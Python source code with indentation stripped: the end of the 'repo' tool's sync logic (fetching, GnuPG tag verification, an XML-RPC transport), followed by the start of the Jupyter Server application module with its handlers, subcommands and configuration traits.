to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt, err_event)
_PostRepoFetch(rp, opt.repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
if err_event.is_set():
print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr)
sys.exit(1)
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt, err_event))
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
err_network_sync = True
if opt.fail_fast:
print('\nerror: Exited sync due to fetch errors.\n'
'Local checkouts *not* updated. Resolve network issues & '
'retry.\n'
'`repo sync -l` will update some local checkouts.',
file=sys.stderr)
sys.exit(1)
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
err_event.set()
err_update_projects = True
if opt.fail_fast:
print('\nerror: Local checkouts *not* updated.', file=sys.stderr)
sys.exit(1)
err_results = []
self._Checkout(all_projects, opt, err_event, err_results)
if err_event.is_set():
err_checkout = True
# NB: We don't exit here because this is the last step.
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
print('\nerror: Unable to fully sync the tree.', file=sys.stderr)
if err_network_sync:
print('error: Downloading network changes failed.', file=sys.stderr)
if err_update_projects:
print('error: Updating local project lists failed.', file=sys.stderr)
if err_checkout:
print('error: Checking out local projects failed.', file=sys.stderr)
if err_results:
print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr)
print('Try re-running with "-j1 --fail-fast" to exit at the first error.',
file=sys.stderr)
sys.exit(1)
if not opt.quiet:
print('repo sync has finished successfully.')
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, repo_verify=True, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if not repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir
env['GNUPGHOME'] = gpg_dir
cmd = [GIT, 'tag', '-v', cur]
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env, check=False)
if result.returncode:
print(file=sys.stderr)
print(result.stdout, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a * t) + ((1 - a) * old)
def _Load(self):
if self._times is None:
try:
with open(self._path) as f:
self._times = json.load(f)
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
with open(self._path, 'w') as f:
json.dump(self._times, f, indent=2)
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib2
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy})
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
serverapp.py | # coding: utf-8
"""A tornado based Jupyter server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import binascii
import datetime
import errno
import gettext
import hashlib
import hmac
import inspect
import io
import ipaddress
import json
import logging
import mimetypes
import os
import pathlib
import random
import re
import select
import signal
import socket
import stat
import sys
import threading
import time
import urllib
import webbrowser
from base64 import encodebytes
try:
import resource
except ImportError:
# Windows
resource = None
from jinja2 import Environment, FileSystemLoader
from jupyter_core.paths import secure_write
from jupyter_server.transutils import trans, _i18n
from jupyter_server.utils import run_sync_in_loop, urljoin, pathname2url
# the minimum viable tornado version: needs to be kept in sync with setup.py
MIN_TORNADO = (6, 1, 0)
try:
import tornado
assert tornado.version_info >= MIN_TORNADO
except (ImportError, AttributeError, AssertionError) as e: # pragma: no cover
raise ImportError(_i18n("The Jupyter Server requires tornado >=%s.%s.%s") % MIN_TORNADO) from e
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith("win"):
from tornado.netutil import bind_unix_socket
from jupyter_server import (
DEFAULT_JUPYTER_SERVER_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from jupyter_server.base.handlers import MainHandler, RedirectWithParams, Template404
from jupyter_server.log import log_request
from jupyter_server.services.kernels.kernelmanager import (
MappingKernelManager,
AsyncMappingKernelManager,
)
from jupyter_server.services.config import ConfigManager
from jupyter_server.services.contents.manager import AsyncContentsManager, ContentsManager
from jupyter_server.services.contents.filemanager import (
AsyncFileContentsManager,
FileContentsManager,
)
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.services.sessions.sessionmanager import SessionManager
from jupyter_server.gateway.managers import (
GatewayMappingKernelManager,
GatewayKernelSpecManager,
GatewaySessionManager,
GatewayClient,
)
from jupyter_server.auth.login import LoginHandler
from jupyter_server.auth.logout import LogoutHandler
from jupyter_server.base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp,
base_flags,
base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any,
Dict,
Unicode,
Integer,
List,
Bool,
Bytes,
Instance,
TraitError,
Type,
Float,
observe,
default,
validate,
)
from jupyter_core.paths import jupyter_runtime_dir
from jupyter_server._sysinfo import get_sys_info
from jupyter_server._tz import utcnow
from jupyter_server.utils import (
url_path_join,
check_pid,
url_escape,
pathname2url,
unix_socket_in_use,
urlencode_unix_socket_path,
fetch,
)
from jupyter_server.extension.serverextension import ServerExtensionApp
from jupyter_server.extension.manager import ExtensionManager
from jupyter_server.extension.config import ExtensionConfigManager
from jupyter_server.traittypes import TypeFromClasses
# Tolerate missing terminado package.
try:
from jupyter_server.terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
# -----------------------------------------------------------------------------
# Module globals
# -----------------------------------------------------------------------------
_examples = """
jupyter server # start the server
jupyter server --certfile=mycert.pem # use SSL/TLS certificate
jupyter server password # enter a password to protect the server
"""
JUPYTER_SERVICE_HANDLERS = dict(
auth=None,
api=["jupyter_server.services.api.handlers"],
config=["jupyter_server.services.config.handlers"],
contents=["jupyter_server.services.contents.handlers"],
files=["jupyter_server.files.handlers"],
kernels=["jupyter_server.services.kernels.handlers"],
kernelspecs=[
"jupyter_server.kernelspecs.handlers",
"jupyter_server.services.kernelspecs.handlers",
],
nbconvert=["jupyter_server.nbconvert.handlers", "jupyter_server.services.nbconvert.handlers"],
security=["jupyter_server.services.security.handlers"],
sessions=["jupyter_server.services.sessions.handlers"],
shutdown=["jupyter_server.services.shutdown"],
view=["jupyter_server.view.handlers"],
)
# Added for backwards compatibility from classic notebook server.
DEFAULT_SERVER_PORT = DEFAULT_JUPYTER_SERVER_PORT
# -----------------------------------------------------------------------------
# Helper functions
# -----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n - 5):
yield max(1, port + random.randint(-2 * n, 2 * n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=["default_handlers"])
return mod.default_handlers
# -----------------------------------------------------------------------------
# The Tornado web application
# -----------------------------------------------------------------------------
class ServerWebApplication(web.Application):
def __init__(
self,
jupyter_app,
default_services,
kernel_manager,
contents_manager,
session_manager,
kernel_spec_manager,
config_manager,
extra_services,
log,
base_url,
default_url,
settings_overrides,
jinja_env_options,
):
settings = self.init_settings(
jupyter_app,
kernel_manager,
contents_manager,
session_manager,
kernel_spec_manager,
config_manager,
extra_services,
log,
base_url,
default_url,
settings_overrides,
jinja_env_options,
)
handlers = self.init_handlers(default_services, settings)
super(ServerWebApplication, self).__init__(handlers, **settings)
def init_settings(
self,
jupyter_app,
kernel_manager,
contents_manager,
session_manager,
kernel_spec_manager,
config_manager,
extra_services,
log,
base_url,
default_url,
settings_overrides,
jinja_env_options=None,
):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, str):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(
loader=FileSystemLoader(template_path), extensions=["jinja2.ext.i18n"], **jenv_opt
)
sys_info = get_sys_info()
# If the user is running the server in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, "..", ".."))
dev_mode = os.path.exists(os.path.join(base_dir, ".git"))
nbui = gettext.translation(
"nbui", localedir=os.path.join(base_dir, "jupyter_server/i18n"), fallback=True
)
env.install_gettext_translations(nbui, newstyle=False)
if sys_info["commit_source"] == "repository":
# don't cache (rely on 304) when working from master
version_hash = ""
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
now = utcnow()
root_dir = contents_manager.root_dir
home = os.path.expanduser("~")
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = "~" + root_dir[len(home) :]
settings = dict(
# basics
log_function=log_request,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class=FileFindHandler,
static_url_prefix=url_path_join(base_url, "/static/"),
static_handler_args={
# don't cache custom.js
"no_cache_paths": [url_path_join(base_url, "static", "custom")],
},
version_hash=version_hash,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url, "/login"),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
jinja_template_vars=jupyter_app.jinja_template_vars,
websocket_url=jupyter_app.websocket_url,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
serverapp=jupyter_app,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
if base_url and "xsrf_cookie_kwargs" not in settings:
# default: set xsrf cookie on base_url
settings["xsrf_cookie_kwargs"] = {"path": base_url}
return settings
def init_handlers(self, default_services, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings["extra_services"]:
handlers.extend(load_handlers(service))
# Add auth services.
if "auth" in default_services:
handlers.extend([(r"/login", settings["login_handler_class"])])
handlers.extend([(r"/logout", settings["logout_handler_class"])])
# Load default services. Raise exception if service not
# found in JUPYTER_SERVICE_HANLDERS.
for service in default_services:
if service in JUPYTER_SERVICE_HANDLERS:
locations = JUPYTER_SERVICE_HANDLERS[service]
if locations is not None:
for loc in locations:
handlers.extend(load_handlers(loc))
else:
raise Exception(
"{} is not recognized as a jupyter_server "
"service. If this is a custom service, "
"try adding it to the "
"`extra_services` list.".format(service)
)
# Add extra handlers from contents manager.
handlers.extend(settings["contents_manager"].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers("jupyter_server.gateway.handlers")
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
# register base handlers last
handlers.extend(load_handlers("jupyter_server.base.handlers"))
if settings["default_url"] != settings["base_url"]:
# set the URL that will be redirected from `/`
handlers.append(
(
r"/?",
RedirectWithParams,
{
"url": settings["default_url"],
"permanent": False, # want 302, not 301
},
)
)
else:
handlers.append((r"/", MainHandler))
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings["base_url"], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r"(.*)", Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings["started"],
self.settings["kernel_manager"].last_kernel_activity,
]
try:
sources.append(self.settings["api_last_activity"])
except KeyError:
pass
try:
sources.append(self.settings["terminal_last_activity"])
except KeyError:
pass
sources.extend(self.settings["last_activity_times"].values())
return max(sources)
class JupyterPasswordApp(JupyterApp):
"""Set a password for the Jupyter server.
Setting a password secures the Jupyter server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, "jupyter_server_config.json")
def start(self):
from jupyter_server.auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a Jupyter server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado.httpclient import HTTPClient, HTTPRequest
url = server_info["url"]
pid = server_info["pid"]
if log:
log.debug("POST request to %sapi/shutdown", url)
r = fetch(url, method="POST", headers={"Authorization": "token " + server_info["token"]})
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log:
log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith("win"):
return False
if log:
log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log:
log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log:
log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
class JupyterServerStopApp(JupyterApp):
version = __version__
description = "Stop currently running Jupyter server for a given port"
port = Integer(
DEFAULT_JUPYTER_SERVER_PORT,
config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_JUPYTER_SERVER_PORT,
)
sock = Unicode(u"", config=True, help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super(JupyterServerStopApp, self).parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
if not self.shutdown_server(server):
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir, log=self.log))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get("sock", None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get("port", None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint), file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get("sock") or server["port"]), file=sys.stderr)
self.exit(1)
class JupyterServerListApp(JupyterApp):
version = __version__
description = _i18n("List currently running Jupyter servers.")
flags = dict(
jsonlist=(
{"JupyterServerListApp": {"jsonlist": True}},
_i18n("Produce machine-readable JSON list output."),
),
json=(
{"JupyterServerListApp": {"json": True}},
_i18n("Produce machine-readable JSON object on each line of output."),
),
)
jsonlist = Bool(
False,
config=True,
help=_i18n(
"If True, the output will be a JSON list of objects, one per "
"active Jupyer server, each with the details from the "
"relevant server info file."
),
)
json = Bool(
False,
config=True,
help=_i18n(
"If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the JupyterServerListApp.jsonlist configuration value"
),
)
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir, log=self.log))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo["url"]
if serverinfo.get("token"):
url = url + "?token=%s" % serverinfo["token"]
print(url, "::", serverinfo["root_dir"])
# -----------------------------------------------------------------------------
# Aliases and Flags
# -----------------------------------------------------------------------------
flags = dict(base_flags)
flags["allow-root"] = (
{"ServerApp": {"allow_root": True}},
_i18n("Allow the server to be run from root user."),
)
flags["no-browser"] = (
{"ServerApp": {"open_browser": False}, "ExtensionApp": {"open_browser": False}},
_i18n("Prevent the opening of the default url in the browser."),
)
flags["debug"] = (
{"ServerApp": {"log_level": "DEBUG"}, "ExtensionApp": {"log_level": "DEBUG"}},
_i18n("Set debug level for the extension and underlying server applications."),
)
flags["autoreload"] = (
{"ServerApp": {"autoreload": True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in server or
extensions.
""",
)
# Add notebook manager flags
flags.update(
boolean_flag(
"script", "FileContentsManager.save_script", "DEPRECATED, IGNORED", "DEPRECATED, IGNORED"
)
)
aliases = dict(base_aliases)
aliases.update(
{
"ip": "ServerApp.ip",
"port": "ServerApp.port",
"port-retries": "ServerApp.port_retries",
"sock": "ServerApp.sock",
"sock-mode": "ServerApp.sock_mode",
"transport": "KernelManager.transport",
"keyfile": "ServerApp.keyfile",
"certfile": "ServerApp.certfile",
"client-ca": "ServerApp.client_ca",
"notebook-dir": "ServerApp.root_dir",
"preferred-dir": "ServerApp.preferred_dir",
"browser": "ServerApp.browser",
"pylab": "ServerApp.pylab",
"gateway-url": "GatewayClient.url",
}
)
# -----------------------------------------------------------------------------
# ServerApp
# -----------------------------------------------------------------------------
class ServerApp(JupyterApp):
name = "jupyter-server"
version = __version__
description = _i18n(
"""The Jupyter Server.
This launches a Tornado-based Jupyter Server."""
)
examples = _examples
flags = Dict(flags)
aliases = Dict(aliases)
classes = [
KernelManager,
Session,
MappingKernelManager,
KernelSpecManager,
AsyncMappingKernelManager,
ContentsManager,
FileContentsManager,
AsyncContentsManager,
AsyncFileContentsManager,
NotebookNotary,
GatewayMappingKernelManager,
GatewayKernelSpecManager,
GatewaySessionManager,
GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
subcommands = dict(
list=(JupyterServerListApp, JupyterServerListApp.description.splitlines()[0]),
stop=(JupyterServerStopApp, JupyterServerStopApp.description.splitlines()[0]),
password=(JupyterPasswordApp, JupyterPasswordApp.description.splitlines()[0]),
extension=(ServerExtensionApp, ServerExtensionApp.description.splitlines()[0]),
)
# A list of services whose handlers will be exposed.
# Subclasses can override this list to
# expose a subset of these handlers.
default_services = (
"api",
"auth",
"config",
"contents",
"files",
"kernels",
"kernelspecs",
"nbconvert",
"security",
"sessions",
"shutdown",
"view",
)
_log_formatter_cls = LogFormatter
@default("log_level")
def _default_log_level(self):
return logging.INFO
@default("log_format")
def _default_log_format(self):
"""override default log format to include date & time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
# file to be opened in the Jupyter server
file_to_run = Unicode("", help="Open the named file when the application is launched.").tag(
config=True
)
file_url_prefix = Unicode(
"notebooks", help="The URL prefix where files are opened directly."
).tag(config=True)
# Network related information
allow_origin = Unicode(
"",
config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
""",
)
allow_origin_pat = Unicode(
"",
config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
""",
)
allow_credentials = Bool(
False, config=True, help=_i18n("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(
False, config=True, help=_i18n("Whether to allow the user to run the server as root.")
)
autoreload = Bool(
False,
config=True,
help=_i18n("Reload the webapp when changes are made to any Python src files."),
)
default_url = Unicode("/", config=True, help=_i18n("The default URL to redirect to from `/`"))
ip = Unicode(
"localhost", config=True, help=_i18n("The IP address the Jupyter server will listen on.")
)
@default("ip")
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(("localhost", 0))
except socket.error as e:
self.log.warning(
_i18n("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e
)
return "127.0.0.1"
else:
s.close()
return "localhost"
@validate("ip")
def _validate_ip(self, proposal):
value = proposal["value"]
if value == u"*":
value = u""
return value
custom_display_url = Unicode(
u"",
config=True,
help=_i18n(
"""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter server (proxified
or containerized setups for example)."""
),
)
port_env = "JUPYTER_PORT"
port_default_value = DEFAULT_JUPYTER_SERVER_PORT
port = Integer(
config=True, help=_i18n("The port the server will listen on (env: JUPYTER_PORT).")
)
@default("port")
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = "JUPYTER_PORT_RETRIES"
port_retries_default_value = 50
port_retries = Integer(
port_retries_default_value,
config=True,
help=_i18n(
"The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES)."
),
)
@default("port_retries")
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u"", config=True, help="The UNIX socket the Jupyter server will listen on.")
sock_mode = Unicode(
"0600", config=True, help="The permissions mode for UNIX socket creation (default: 0600)."
)
@validate("sock_mode")
def _validate_sock_mode(self, proposal):
value = proposal["value"]
try:
converted_value = int(value.encode(), 8)
assert all(
(
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12,
)
)
except ValueError:
raise TraitError('invalid --sock-mode value: %s, please specify as e.g. "0600"' % value)
except AssertionError:
raise TraitError(
"invalid --sock-mode value: %s, must have u+rw (0600) at a minimum" % value
)
return value
certfile = Unicode(
u"", config=True, help=_i18n("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(
u"",
config=True,
help=_i18n("""The full path to a private key file for usage with SSL/TLS."""),
)
client_ca = Unicode(
u"",
config=True,
help=_i18n(
"""The full path to a certificate authority certificate for SSL/TLS client authentication."""
),
)
cookie_secret_file = Unicode(
config=True, help=_i18n("""The file where the cookie secret is stored.""")
)
@default("cookie_secret_file")
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, "jupyter_cookie_secret")
cookie_secret = Bytes(
b"",
config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the server.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
""",
)
@default("cookie_secret")
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, "rb") as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_i18n("Writing Jupyter server cookie secret to %s"), self.cookie_secret_file)
try:
with secure_write(self.cookie_secret_file, True) as f:
f.write(secret)
except OSError as e:
self.log.error(
_i18n("Failed to write cookie secret to %s: %s"), self.cookie_secret_file, e
)
token = Unicode(
"<generated>",
help=_i18n(
"""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
"""
),
).tag(config=True)
_token_generated = True
@default("token")
def _token_default(self):
if os.getenv("JUPYTER_TOKEN"):
self._token_generated = False
return os.getenv("JUPYTER_TOKEN")
if os.getenv("JUPYTER_TOKEN_FILE"):
self._token_generated = False
with io.open(os.getenv("JUPYTER_TOKEN_FILE"), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u""
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode("ascii")
min_open_files_limit = Integer(
config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
